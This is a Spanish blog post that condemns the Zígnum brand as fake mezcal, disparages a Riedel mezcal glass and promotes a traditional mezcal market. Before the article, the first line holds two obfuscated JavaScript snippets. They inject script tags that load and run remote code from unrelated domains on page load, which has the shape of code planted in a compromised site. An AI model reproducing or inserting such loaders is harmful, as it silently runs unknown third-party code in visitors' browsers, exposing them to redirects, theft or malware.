;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 40. Mezcal falso

40. Mezcal falso


Compré un destilado chatarra Zígnum, cuya botella decía contener mezcal joven 100% agave, a 38% ALC. VOL., y elaborarse en Tlacolula, Oaxaca. Para probarlo usé un jomate, una copa flauta y la que usa The Scotch Malt Whisky Society.
Compartí la experiencia con mis padres, nacidos en Ejutla, Oaxaca. Mi madre dijo: “eso ni huele ni sabe a mezcal, es un timo”. Mi padre, que bailó en la primera Guelaguetza en 1932 representando a Ejutla, preguntó: “¿qué es esta chingadera?”.
Zígnum no es mezcal, y cualquier maestro mezcalillero o habitante de las comunidades mezcaleras oaxaqueñas lo sabe; también lo saben los oaxaqueños de bien que respetan su extraordinaria cultura gastronómica.
Para colmo, Zígnum y Riedel -fabricante de copas- diseñaron una copa mezcalera (impreso.milenio.com/node/8707857) que pretenden imponer como estándar. La copa es un fraude, y lo afirmo porque la probé con 5 mezcales tradicionales servidos en cinco diferentes copas (tengo fotos de la sesión), entre ellas la Riedel. Resultado: las mejores fueron el jomate y la de la asociación de whiskys; la peor, Riedel.
Como puede verse, estas empresas pretenden despojar a las comunidades mezcaleras de su patrimonio cultural, al tiempo que destruyen el mezcal y el paladar del consumidor, con la anuencia, como siempre, de funcionarios que desconocen el mezcal.
¿Permitiremos que empresas que nunca han hecho mezcal ahora nos digan, a los oaxaqueños y a los mexicanos, cómo deben ser nuestros mezcales? ¿Permitiremos que ahora, como sucedió con el tequila, estas “empresas” destruyan los mezcales y las gastronomías tradicionales de México? ¿Acaso estamos dispuestos a atragantarnos con destilados chatarra?
Preservar los mezcales tradicionales implica un compromiso colectivo de no producir ni consumir destilados chatarra, para evitar así deslizarnos por la – sin retorno ya – Ruta del Tequila.
Para adquirir mezcales tradicionales, hay que asistir al Tianguis Mezcalero hoy sábado de 11 a 16 horas en Red Fly: Orizaba 145, Roma, DF.
http://impreso.milenio.com/node/8830691

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *